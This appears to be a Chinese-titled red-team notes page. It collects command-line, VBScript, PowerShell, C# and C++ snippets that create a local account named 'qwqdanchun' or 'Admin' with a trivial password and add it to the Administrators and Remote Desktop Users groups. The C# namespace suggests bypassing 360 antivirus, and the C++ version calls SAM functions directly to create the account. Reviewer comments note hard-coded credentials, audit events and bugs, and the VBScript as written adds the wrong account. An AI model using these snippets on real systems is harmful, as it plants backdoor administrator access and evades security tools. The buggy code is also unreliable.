
新建用户

新建用户并添加管理员及远程访问权限
命令行:
REM Creates a local account, then adds it to the local "administrators" and "remote desktop users" groups.
REM NOTE(review): the account name and password are literals on the command line, so they are visible in
REM shell history and in command-line / process-creation auditing wherever that is enabled.
net user qwqdanchun password /add /y
net localgroup administrators qwqdanchun /add
net localgroup "remote desktop users" qwqdanchun /add
VBScript (原文标为 Powershell):
' Creates a local user through the WinNT ADSI provider and then adds a member to the local
' Administrators group. NOTE(review): this is VBScript (CreateObject/GetObject/Set), not PowerShell.
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName   ' ADSI path of the local machine
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")   ' local Administrators group object
Set od=ob.Create("user","qwqdanchun")   ' new account object; the password below is a plain-text literal in source
od.SetPassword "password"
od.SetInfo   ' commits the new account to the local SAM
' NOTE(review): "user" is never declared or assigned in this snippet, and "of" is never used afterwards.
' This line binds "/admin", not the "qwqdanchun" account created above.
Set of=GetObject(os&"/admin",user)
' NOTE(review): adds "/admin" to Administrators, not the account created above, so this script as written
' does not grant "qwqdanchun" the group membership the heading describes.
oe.add os&"/admin"
Powershell(另一个版本):
# Creates a local user with New-LocalUser and adds it to the local "administrators" group.
$Username = "qwqdanchun"
$P = "password"
# NOTE(review): the password is a plain-text literal; ConvertTo-SecureString -AsPlainText -Force only wraps it
# for the cmdlet parameter and does not protect the value stored in this script.
$Password = ConvertTo-SecureString $P -AsPlainText -Force
New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user."
# The member name is hard-coded again here instead of reusing $Username.
Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun"
c#(使用系统 API 函数):
using System;
using System.Runtime.InteropServices;
namespace Bypass360Add
{
/// <summary>
/// Entry point: creates a local account and adds it to the local "Administrators" group through
/// <see cref="LocalGroupUserHelper"/>, then terminates the process with exit code 1.
/// NOTE(review): despite the class name nothing here bypasses UAC; the Netapi32 calls behind the helper
/// need the caller to already hold administrator rights on the target, so this only works when run elevated.
/// </summary>
public static class BypassUAC_csharp
{
// Raw kernel32 ExitProcess; Environment.Exit would be the managed equivalent.
[DllImport("kernel32.dll")]
static extern void ExitProcess(uint uExitCode);
/// <summary>Runs the two helper calls with hard-coded credentials. <paramref name="args"/> is unused.</summary>
public static void Main(string[] args)
{
LocalGroupUserHelper local = new LocalGroupUserHelper();
string username = "qwqdanchun"; // hard-coded account name
string password = "password"; // hard-coded plain-text password (secret in source)
string groupname = "Administrators";
local.AddUser(null, username, password, null); // null server name targets the local machine (per NetUserAdd's servername parameter)
local.GroupAddMembers(null, groupname, username);
ExitProcess(1); // exit code 1 regardless of whether either call succeeded; failures are only printed by the helper
}
}
/// <summary>
/// Thin P/Invoke wrapper over Netapi32's NetUserAdd (info level 1) and NetLocalGroupAddMembers (info level 3).
/// Both methods discard the native status code and only print a fixed message to the console on a non-zero return.
/// NOTE(review): account creation and local-group membership changes made through these APIs surface in the
/// Windows Security log under account-management auditing (events 4720 and 4732) when that audit category is enabled.
/// </summary>
public class LocalGroupUserHelper
{
// NOTE(review): the native parm_err parameter is a DWORD*; declaring it as int and passing 0 hands the API a NULL
// pointer, which it accepts, but the index of the offending field on failure is lost.
[DllImport("Netapi32.dll")]
extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
[DllImport("Netapi32.dll")]
extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
// Managed mirror of the native LOCALGROUP_MEMBERS_INFO_3 (single Unicode string member).
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct LOCALGROUP_MEMBERS_INFO_3
{
public string domainandname; // //lgrmi3_domainandname
}
// Managed mirror of the native USER_INFO_1. Field order is part of the marshalling contract and must not change.
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct USER_INFO_1
{
public string usri1_name;
public string usri1_password;
public int usri1_password_age;
public int usri1_priv;
public string usri1_home_dir;
public string comment; // native field name is usri1_comment
public int usri1_flags;
public string usri1_script_path;
}
/// <summary>
/// Creates a local user account via NetUserAdd at info level 1.
/// </summary>
/// <param name="serverName">Target server; null means the local machine.</param>
/// <param name="userName">Account name to create.</param>
/// <param name="password">Plain-text password handed to the API unchanged.</param>
/// <param name="strComment">Free-text comment stored on the account; may be null.</param>
/// <remarks>Failure is only reported by writing "Error Adding User" to the console; the status code is discarded.</remarks>
public void AddUser(string serverName, string userName, string password, string strComment)
{
USER_INFO_1 NewUser = new USER_INFO_1(); // create a USER_INFO_1 instance
NewUser.usri1_name = userName; // Allocates the username
NewUser.usri1_password = password; // allocates the password
NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
NewUser.comment = strComment; // Comment on the User
NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
// NOTE(review): usri1_flags is left at its default 0; the NetUserAdd documentation calls for UF_SCRIPT in this field — confirm.
if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) // non-zero return means the add failed
{
Console.WriteLine("Error Adding User");
}
}
/// <summary>
/// Adds one member to a local group via NetLocalGroupAddMembers at info level 3 (name-based member).
/// </summary>
/// <param name="serverName">Target server; null means the local machine.</param>
/// <param name="groupName">Local group to modify.</param>
/// <param name="userName">Member name to add; passed as-is in the domainandname field.</param>
/// <remarks>Failure is only reported by writing "Error Adding Group Member" to the console; the status code is discarded.</remarks>
public void GroupAddMembers(string serverName, string groupName, string userName)
{
LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
NewMember.domainandname = userName;
if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) // non-zero return means the add failed
{
Console.WriteLine("Error Adding Group Member");
}
}
}
}
c++(重写AddUser):
#include "ApiAddUser.h"
// Entry point: creates a local SAM account ("Admin" with password "Admin") by calling samlib's
// SamXxx exports resolved at run time, instead of the NetUserAdd wrapper used in the C# version.
// NOTE(review): every Status assignment is overwritten by the next call and never checked, and the
// GetProcAddress results are used without a NULL check, so a missing export or a failed
// SamConnect/SamOpenDomain dereferences NULL instead of failing cleanly.
// NOTE(review): ServerHandle, DomainHandle, UserHandle, hPolicy and DomainInfo are never released
// (SamCloseHandle / LsaClose / LsaFreeMemory) before return; hNetapi32 is declared but never used.
// NOTE(review): account creation through SAM lands in the same account-management audit events
// as the Netapi32 path when that audit category is enabled — confirm against the Security log.
// Returns 0 unconditionally; argc/argv are unused.
int wmain(int argc, wchar_t* argv[])
{
UNICODE_STRING UserName;
UNICODE_STRING PassWord;
HANDLE ServerHandle = NULL;
HANDLE DomainHandle = NULL;
HANDLE UserHandle = NULL;
ULONG GrantedAccess;
ULONG RelativeId;
NTSTATUS Status = NULL; // NOTE(review): NTSTATUS is an integer; initialising it with NULL is a type mismatch
HMODULE hSamlib = NULL;
HMODULE hNtdll = NULL;
HMODULE hNetapi32 = NULL;
LSA_HANDLE hPolicy = NULL;
LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
USER_ALL_INFORMATION uai = { 0 };
// Function pointers are resolved by name at run time; the pSamXxx typedefs come from ApiAddUser.h (not shown here).
hSamlib = LoadLibraryA("samlib.dll");
hNtdll = LoadLibraryA("ntdll");
pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject"); // resolved but never called
pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
RtlInitUnicodeString(&UserName, L"Admin"); // hard-coded account name
RtlInitUnicodeString(&PassWord, L"Admin"); // hard-coded plain-text password
Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);; // stray second ';'
// The local account-domain SID is obtained from LSA policy and used to open the SAM domain.
Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);
Status = SamOpenDomain(ServerHandle,
DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS,
DomainInfo->DomainSid, // NOTE(review): DomainInfo is still NULL here if the LSA query above failed
&DomainHandle);
Status = SamCreateUser2InDomain(DomainHandle,
&UserName,
USER_NORMAL_ACCOUNT,
USER_ALL_ACCESS | DELETE | WRITE_DAC,
&UserHandle,&GrantedAccess,&RelativeId);
// Only the NT password field of USER_ALL_INFORMATION is populated and selected via WhichFields.
RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
uai.NtPasswordPresent = TRUE;
uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;
Status = SamSetInformationUser(UserHandle,
UserAllInformation,
&uai);
return 0;
}